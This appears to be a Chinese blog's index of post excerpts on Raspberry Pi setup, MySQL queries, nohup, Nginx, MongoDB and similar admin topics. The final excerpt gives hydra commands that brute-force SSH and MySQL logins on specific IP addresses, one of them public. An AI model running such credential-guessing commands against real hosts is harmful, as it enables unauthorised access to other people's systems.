摘要:
sudo pip install rpi.gpio 阅读全文
摘要:
LCD和hdmi切换 /home/LCD-show-master 目录下 LCD-hdmi LCD35-show 时区修改 sudo cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime date -R wifi配置 cat /etc/wpa_sup 阅读全文
摘要:
nohup python test.py > nohup.out 2>&1 & 发现nohup.out中显示不出来python程序中print的东西。 这是因为python的输出有缓冲,导致nohup.out并不能够马上看到输出。 python 有个-u参数,使得python不启用缓冲。 nohup 阅读全文
摘要:
mod 取余是用函数mod(numer1,number2),其返回的值为其余数值 如:mod(id,2) = 1 返回id号是奇数的id Email后缀提取 emailorg=RIGHT(EMail,LENGTH(EMail)- INSTR(EMail,'@')) 阅读全文
摘要:
select ('123a' REGEXP '[^0-9.]'); --‘123a'中含有字符'a' 输出结果为1 mysql中常量true输出为1 false输出为0非数字和字母SELECT * from s WHERE (name1 REGEXP '[A-Za-z0-9]')=0 阅读全文
摘要:
不支持的 select * into order_new from orders 改为 Create table order_new(select * from orders) 阅读全文
摘要:
http://tushare.org/ https://tushare.pro/ 阅读全文
摘要:
function main(splash, args) splash.images_enabled = false //不加载图片 assert(splash:go(args.url)) assert(splash:wait(1.5)) return { html = splash:html(), png = splash:png(), har = sp... 阅读全文
摘要:
${project.basedir}/src/main/resources true static/layuiadmin/layui/font/** ${project.basedir}/src/main/resources false static/layuiadmin/layui/font/** ... 阅读全文
摘要:
错误:使用Nginx的反向代理访问tomcat时400错误。 upstream配置: upstream java_test{ server 127.0.0.1:8080; } 原因:nginx中upstream后面的名称不能使用下滑线,Nginx不能识别。 解决:将java_test改成java-t 阅读全文
摘要:
windows:mongod.exe --logpath D:\mongodb\logs\mongodb.log --logappend --dbpath D:\mongodb\data --directoryperdb --serviceName MongoDB --install 阅读全文
摘要:
while true do nc -vz 127.0.0.1 1234 rs=$? echo $rs if [ $rs -gt 0 ] then echo "1" ls else echo "0" ls -l fi sleep 2 done 阅读全文
摘要:
# -*- coding: utf-8 -*- """ Spyder Editor This is a temporary script file. """ import itchat, time def lc(): print("Finash Login!") def ec(): print("exit") itchat.auto_login(loginCallback=... 阅读全文
摘要:
mount: wrong fs type, bad option, bad superblock on 125.64.41.244:/data/img, missing codepage or helper program, or other error (for several filesyste 阅读全文
摘要:
hydra -L user.txt -P pass.txt -o savessh.log -f -vV -e ns 10.0.5.24 sshhydra -L user.txt -P sup.txt -o savessh.log -f -vV -e ns 113.105.144.130 mysql 阅读全文